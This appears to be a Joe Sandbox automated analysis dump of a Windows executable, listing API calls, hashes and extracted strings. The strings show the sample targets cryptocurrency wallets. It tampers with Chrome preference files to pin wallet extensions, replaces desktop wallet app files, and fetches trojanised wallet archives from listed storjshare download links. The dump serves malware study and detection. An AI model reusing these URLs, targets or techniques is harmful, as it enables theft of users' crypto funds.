                                                                                                                                                                  • RtlFreeHeap.NTDLL(?,?,?,00007FF72CA12B26,?,?,?,00007FF72CA12EA3,?,?,00000000,00007FF72CA133AD,?,?,?,00007FF72CA132DF), ref: 00007FF72CA08356
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00007FF72CA12B26,?,?,?,00007FF72CA12EA3,?,?,00000000,00007FF72CA133AD,?,?,?,00007FF72CA132DF), ref: 00007FF72CA08360
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorFreeHeapLast
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 485612231-0
                                                                                                                                                                  APIs
                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,00007FF72CA083CD,?,?,00000000,00007FF72CA08482), ref: 00007FF72CA085BE
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00007FF72CA083CD,?,?,00000000,00007FF72CA08482), ref: 00007FF72CA085C8
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseErrorHandleLast
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 918212764-0
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                  • Opcode ID: 80c2eff22136f4c169f0431fb234af93064a5610cb2ce0def08195f1cb992f7f
                                                                                                                                                                  • Instruction ID: 4de849330cbbb0588231d1e3a6dd17bedb64c5cd47fc3bcc23fd90d4bb2eee66
                                                                                                                                                                  • Opcode Fuzzy Hash: 80c2eff22136f4c169f0431fb234af93064a5610cb2ce0def08195f1cb992f7f
                                                                                                                                                                  • Instruction Fuzzy Hash: FE41903291860147FA24AB39B940BB9B3B4FB75BE5F940130DA9E436D1DF2DE402CB60
                                                                                                                                                                  APIs
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3668304517-0
                                                                                                                                                                  • Opcode ID: 7f2f581e78f95bd5cb904041401751313ae5732a15b65ec4300bfd25b081b8d2
                                                                                                                                                                  • Instruction ID: 2d359aada39e56a3da9ba73028af709a811df88e60c2577676b96494588c59fe
                                                                                                                                                                  • Opcode Fuzzy Hash: 7f2f581e78f95bd5cb904041401751313ae5732a15b65ec4300bfd25b081b8d2
                                                                                                                                                                  • Instruction Fuzzy Hash: A3315836B05B4982EF159F29D49022C7365EB58F98B848032DF4D07368CF3CD891CB50
                                                                                                                                                                  APIs
                                                                                                                                                                  • _invalid_parameter_noinfo.LIBCMT ref: 00007FF72CA168A7
                                                                                                                                                                    • Part of subcall function 00007FF72C9FCD60: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF72C9FCD0F,?,?,?,?,?,00007FF72C9FCBFA), ref: 00007FF72C9FCD69
                                                                                                                                                                    • Part of subcall function 00007FF72C9FCD60: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF72C9FCD0F,?,?,?,?,?,00007FF72C9FCBFA), ref: 00007FF72C9FCD8E
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CurrentFeaturePresentProcessProcessor_invalid_parameter_noinfo
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 4036615347-0
                                                                                                                                                                  • Opcode ID: 3d98c4b73ae2db0dcd3f5b2116bc649f4b6edea03ee29548f9e79326a9e3dd55
                                                                                                                                                                  • Instruction ID: 199f6835e5350444595f489dbbff95eb8574ea0c740e2db47f4bc03c95a7221d
                                                                                                                                                                  • Opcode Fuzzy Hash: 3d98c4b73ae2db0dcd3f5b2116bc649f4b6edea03ee29548f9e79326a9e3dd55
                                                                                                                                                                  • Instruction Fuzzy Hash: 9621E421B0971242FB25BA69AD04779E6B0EF60BF0F946530DE5C87BC5DE7DE8118B20
                                                                                                                                                                  APIs
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                  • Opcode ID: 5e62b5da85285c3ea154d9c64e7bec3a32060aad3f6a6f68b67314db75222940
                                                                                                                                                                  • Instruction ID: 51e6998bc720fa9fcab06d61c2a8fb3a0a5263a93d610f42aec26a23758b1123
                                                                                                                                                                  • Opcode Fuzzy Hash: 5e62b5da85285c3ea154d9c64e7bec3a32060aad3f6a6f68b67314db75222940
                                                                                                                                                                  • Instruction Fuzzy Hash: D5318121A18A1286F7517B65BC41BFCA660EF60BF4F850135DA2D033D2EF7CA4418B31
                                                                                                                                                                  APIs
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3668304517-0
                                                                                                                                                                  • Opcode ID: 8de462020b5dbe9e5686f242d72710926f86c6100d8e301e1f1355b1e0c5bfbc
                                                                                                                                                                  • Instruction ID: 117444f90410ab0b62f572c0bcadedc56f16b257d6b92e3ea9883a50112b239a
                                                                                                                                                                  • Opcode Fuzzy Hash: 8de462020b5dbe9e5686f242d72710926f86c6100d8e301e1f1355b1e0c5bfbc
                                                                                                                                                                  • Instruction Fuzzy Hash: 331181A1A14685C1EB04FB25C85837DA351EB65FD8FC08031DA8D0A68EDF6ED9C4DB94
                                                                                                                                                                  APIs
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3947729631-0
                                                                                                                                                                  • Opcode ID: 12c8ddd49b29eafe03094771190050c500c37e2408f84eeddbfe35924bea53d0
                                                                                                                                                                  • Instruction ID: bcf03b9b9ffcac7bd71f3b9a523080a3d3e07c37603953d375a92ed3605152e2
                                                                                                                                                                  • Opcode Fuzzy Hash: 12c8ddd49b29eafe03094771190050c500c37e2408f84eeddbfe35924bea53d0
                                                                                                                                                                  • Instruction Fuzzy Hash: 84219F32A14B018AEBA4AF64C8802EC73B8EB5573CFA40635D6AD06AC5DF38D485CB54
                                                                                                                                                                  APIs
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                  • Opcode ID: 3f3ede2bc854db419c29ee7d11418b5426f282dde39881f24eb10840af044c49
                                                                                                                                                                  • Instruction ID: f0538c95997396e3c9329b0888997f81f78bf0f30046b3211ca9fcaa91518341
                                                                                                                                                                  • Opcode Fuzzy Hash: 3f3ede2bc854db419c29ee7d11418b5426f282dde39881f24eb10840af044c49
                                                                                                                                                                  • Instruction Fuzzy Hash: F921B333A1CA8586E760AF28E841B79B6B0EBA4BA4F944234E65D476D9DF3DD4008F10
                                                                                                                                                                  APIs
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                  • Opcode ID: 17c84bb8df17f7340c3a78faa9adff03cae7faf370082ad63592511e71fde380
                                                                                                                                                                  • Instruction ID: b148e52417fd535af324851b340ff16f3ed8a9a94a3074b5127d6b9d91b10561
                                                                                                                                                                  • Opcode Fuzzy Hash: 17c84bb8df17f7340c3a78faa9adff03cae7faf370082ad63592511e71fde380
                                                                                                                                                                  • Instruction Fuzzy Hash: 56216573A18A8147E761AF68E880779B6B0EBA4BE4F944234E65D476D9DF3DD4008F10
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                  APIs
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3668304517-0
                                                                                                                                                                  APIs
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                  APIs
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00007FF72C9EE3AC: FindClose.KERNEL32(?,?,?,?,00007FF72C9D5182), ref: 00007FF72C9EE3B6
                                                                                                                                                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF72C9D8816
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseFind_invalid_parameter_noinfo_noreturn
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1011579015-0
                                                                                                                                                                  APIs
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _fread_nolock
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 840049012-0
                                                                                                                                                                  APIs
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                  APIs
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                   • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                   • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseFind
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1863332320-0
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                   • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FileFindNext
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2029273394-0
                                                                                                                                                                  APIs
                                                                                                                                                                  • HeapAlloc.KERNEL32(?,?,?,00007FF72C9F47BB,?,?,?,?,?,?,?,?,?,00007FF72C9EEED5), ref: 00007FF72CA0A1A6
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                   • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AllocHeap
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 4292702814-0
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                   • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: memcpy_s$_invalid_parameter_noinfo
                                                                                                                                                                  • String ID: $ $*L\(&.
                                                                                                                                                                  • API String ID: 2880407647-586644833
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                   • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                  • String ID: *L\(&.$+$Could not open Secure Preferences file: $Could not write to Secure Preferences file: $Modified Secure Preferences for profile at $Wallet ID not found in chromeData: $\Secure Preferences$data$extensions$hash$invalid map<K, T> key$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set$macs$protection$settings
                                                                                                                                                                  • API String ID: 3668304517-450133532
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                   • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                  • String ID: %$*L\(&.$Could not open Preferences file: $Could not write to Preferences file: $Pinned wallets for profile at $\Preferences$developer_mode$extensions$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set$pinned_extensions
                                                                                                                                                                  • API String ID: 3668304517-85695423
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                   • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo$memcpy_s$fegetenv
                                                                                                                                                                  • String ID: *L\(&.$1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                  • API String ID: 808467561-2065258574
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$__std_fs_code_page
                                                                                                                                                                  • String ID: Directory: $ $ (User: $.lnk$.zip$Atomic$C:\Users\Public\Desktop\$Electrum$Wallet: $\resources\app\assets\index.js$atomic.exe
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                  • String ID: Directory: $ $ (User: $.lnk$.zip$Atomic$C:\Users\Public\Desktop\$Electrum$Wallet: $\resources\app\assets\index.js$atomic.exe
                                                                                                                                                                  • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                                                                                                                  • String ID: 1Gl-tclZiwzl6g0KiESfdjoxWpKS4etTy$1PawyaJNdMeRZ58R98lDRBDFhVGrvATkk$1Q8Qas1_ewfzUMTS1hokwKRwiYzLHSrWN$1T6M8C2frvgzxZ5QXvqg3JwQUquC0rvYi$1Wvj4ujXtbazj3MOxU05QXrkL4bCHwl2J$1XbWC5eWnyEZCUtT5_ZxFbRnbH9aKnawV$1Zz3U8oG_dniKMFaigIhNDA-r_Qxo1qXX$1hpFGL_MKbqCzc4V3YaZ29A4JaDrWxIN2$1lRNFMUWkcGIGS67XkeWfhXMPjev6B5Cg$1mwoKtHlgA_FGSglUyMP1ZtIPsSVHtwF1$aholpfdialjgjfhomihkjbmgjidlcdno$bfnaelmomeimhlpmgjnjophhpkkoljpa$efbglgofoippbgcjepnhiblaibcnclgk$egjidjbpglichdcondbcbdnbeeppgdph$fnjhmkhhmkbjkkabndcnnogagogbneec$hifafgmccdpekplomjjkcfgodnhcellj$hnfanknocfeofbddgcijnmhnfnkdnaad$lpfcbjknijpeeillifnkikgncikgfhdo$mcohilncbfahbmgdjkbpemcciiolgcge$nkbihfbeogaeaoehlefnkodbefgpgknn
                                                                                                                                                                  • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                                                                                                                  • String ID: Coinbase$Crypto$Exodus$Martian$MetaMask$Nami$OKX Wallet$Phantom$Ronin Wallet$Trust Wallet$aholpfdialjgjfhomihkjbmgjidlcdno$bfnaelmomeimhlpmgjnjophhpkkoljpa$efbglgofoippbgcjepnhiblaibcnclgk$egjidjbpglichdcondbcbdnbeeppgdph$fnjhmkhhmkbjkkabndcnnogagogbneec$hifafgmccdpekplomjjkcfgodnhcellj$hnfanknocfeofbddgcijnmhnfnkdnaad$lpfcbjknijpeeillifnkikgncikgfhdo$mcohilncbfahbmgdjkbpemcciiolgcge$nkbihfbeogaeaoehlefnkodbefgpgknn
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_task
                                                                                                                                                                  • String ID: *L\(&.$Duplicate key: '$Missing ',' or '}' in object declaration$Missing ':' after object member name$Missing '}' or object member name$keylength >= 2^30
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: allowComments$allowDroppedNullPlaceholders$allowNumericKeys$allowSingleQuotes$allowSpecialFloats$allowTrailingCommas$collectComments$failIfExtra$rejectDupKeys$skipBom$stackLimit$strictRoot
                                                                                                                                                                  • API ID: Value$Locale$CodeErrorInfoLastPageValid$DefaultEnumLocalesProcessSystemUser
                                                                                                                                                                  • String ID: *L\(&.
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: All$commentStyle$dropNullPlaceholders$emitUTF8$enableYAMLCompatibility$indentation$precision$precisionType$significant$useSpecialFloats
                                                                                                                                                                  • API String ID: 0-3087533615
                                                                                                                                                                  • Opcode ID: 6ccfe0fd44179b31ec7d352dca0fb3121aaa09fda5683eb3f39eab8598ff935f
                                                                                                                                                                  • Instruction ID: 8c04e90dd699c886b41270057d7a0bd53159729ccb3d56ff92f4c84462a5a576
                                                                                                                                                                  • Opcode Fuzzy Hash: 6ccfe0fd44179b31ec7d352dca0fb3121aaa09fda5683eb3f39eab8598ff935f
                                                                                                                                                                  • Instruction Fuzzy Hash: 3AE15021F1C55241FA04FB65EC617FA9365EFB1B64FC84032D98E17A9ACE2DE501CBA0
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                                                                                                                  • String ID: Atomic Wallet$C:\Program Files (x86)\Electrum$C:\Program Files\Ledger Live$C:\Users\%s\AppData\Local\Programs\Trezor Suite$C:\Users\%s\AppData\Local\Programs\atomic$C:\Users\%s\AppData\Local\exodus$Electrum$Exodus$Ledger Live$Trezor
                                                                                                                                                                  • API String ID: 73155330-2810031701
                                                                                                                                                                  • Opcode ID: 4450588106a22513a7071f97054245c153194049d8708fd02ee4cb1c0438b041
                                                                                                                                                                  • Instruction ID: 16c697cc9a239343c64a031f8ea7dfbc511dbab4a6c6561dd160e7d6ff38581d
                                                                                                                                                                  • Opcode Fuzzy Hash: 4450588106a22513a7071f97054245c153194049d8708fd02ee4cb1c0438b041
                                                                                                                                                                  • Instruction Fuzzy Hash: 0F61A452D28F8681E710EB30EC827B89371FBEA358F905335E98C62456DF6CE684CB54
                                                                                                                                                                  Strings
                                                                                                                                                                  • Exodus, xrefs: 00007FF72C9B1A49
                                                                                                                                                                  • https://link.storjshare.io/s/jx3obcnqgxa2u364c52wel6vrxba/cardan-shafts/Trazor%20(Software).zip?download=1, xrefs: 00007FF72C9B1B0E
                                                                                                                                                                  • https://link.storjshare.io/s/jvbdgt4oiad73vsmb56or2qtzcta/cardan-shafts/Exodus%20(Software)(1).zip?download=1, xrefs: 00007FF72C9B1A72
                                                                                                                                                                  • https://link.storjshare.io/s/jvs5vlroulyshzqirwqzg7wys2wq/cardan-shafts/Atomic%20(Software)(2).zip?download=1, xrefs: 00007FF72C9B1AC2
                                                                                                                                                                  • https://link.storjshare.io/s/jvrb5lh3pynx3et56bisfuuguvoq/cardan-shafts/Electrum%20(Software)(1).zip?download=1, xrefs: 00007FF72C9B1BA6
                                                                                                                                                                  • Ledger Live, xrefs: 00007FF72C9B1B34
                                                                                                                                                                  • Electrum, xrefs: 00007FF72C9B1B80
                                                                                                                                                                  • Atomic, xrefs: 00007FF72C9B1A9B
                                                                                                                                                                  • https://link.storjshare.io/s/jwkj6ktyi5kumzjvhrw6bdbvyceq/cardan-shafts/Ledger%20(Software).zip?download=1, xrefs: 00007FF72C9B1B5A
                                                                                                                                                                  • Trezor, xrefs: 00007FF72C9B1AE8
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                                                                                                                  • String ID: Atomic$Electrum$Exodus$Ledger Live$Trezor$https://link.storjshare.io/s/jvbdgt4oiad73vsmb56or2qtzcta/cardan-shafts/Exodus%20(Software)(1).zip?download=1$https://link.storjshare.io/s/jvrb5lh3pynx3et56bisfuuguvoq/cardan-shafts/Electrum%20(Software)(1).zip?download=1$https://link.storjshare.io/s/jvs5vlroulyshzqirwqzg7wys2wq/cardan-shafts/Atomic%20(Software)(2).zip?download=1$https://link.storjshare.io/s/jwkj6ktyi5kumzjvhrw6bdbvyceq/cardan-shafts/Ledger%20(Software).zip?download=1$https://link.storjshare.io/s/jx3obcnqgxa2u364c52wel6vrxba/cardan-shafts/Trazor%20(Software).zip?download=1
                                                                                                                                                                  • API String ID: 73155330-3394481700
                                                                                                                                                                  • Opcode ID: 816de1025622e20637940e3d9587a4f672e075238e006f15cd3371eaf1fa5348
                                                                                                                                                                  • Instruction ID: 9d3bcb516d0de3f3b5b2330a3fd61b8e8d007169e87951d22e352ea6e3bb860a
                                                                                                                                                                  • Opcode Fuzzy Hash: 816de1025622e20637940e3d9587a4f672e075238e006f15cd3371eaf1fa5348
                                                                                                                                                                  • Instruction Fuzzy Hash: E6517552D64F8A85E710EB30EC827B9A371FBEA358F905336E98C72855DF6CA5C08750
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLastNameTranslate$CodeInfoLocalePageValidValue
                                                                                                                                                                  • String ID: *L\(&.$utf8
                                                                                                                                                                  • API String ID: 3069159798-2230407081
                                                                                                                                                                  • Opcode ID: 48495feded033ddc165fff888afdd27fec235c819a74216447bbbb5d54d34aaa
                                                                                                                                                                  • Instruction ID: f24309308b317f3b8da1c2b099580e6a1993ace5914f1b0e24e961f03477b035
                                                                                                                                                                  • Opcode Fuzzy Hash: 48495feded033ddc165fff888afdd27fec235c819a74216447bbbb5d54d34aaa
                                                                                                                                                                  • Instruction Fuzzy Hash: AD91A432A0974285EB24BF21E801AB9A3B4EF64BA0F845131DE5C4B785DFBCE551CB60
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
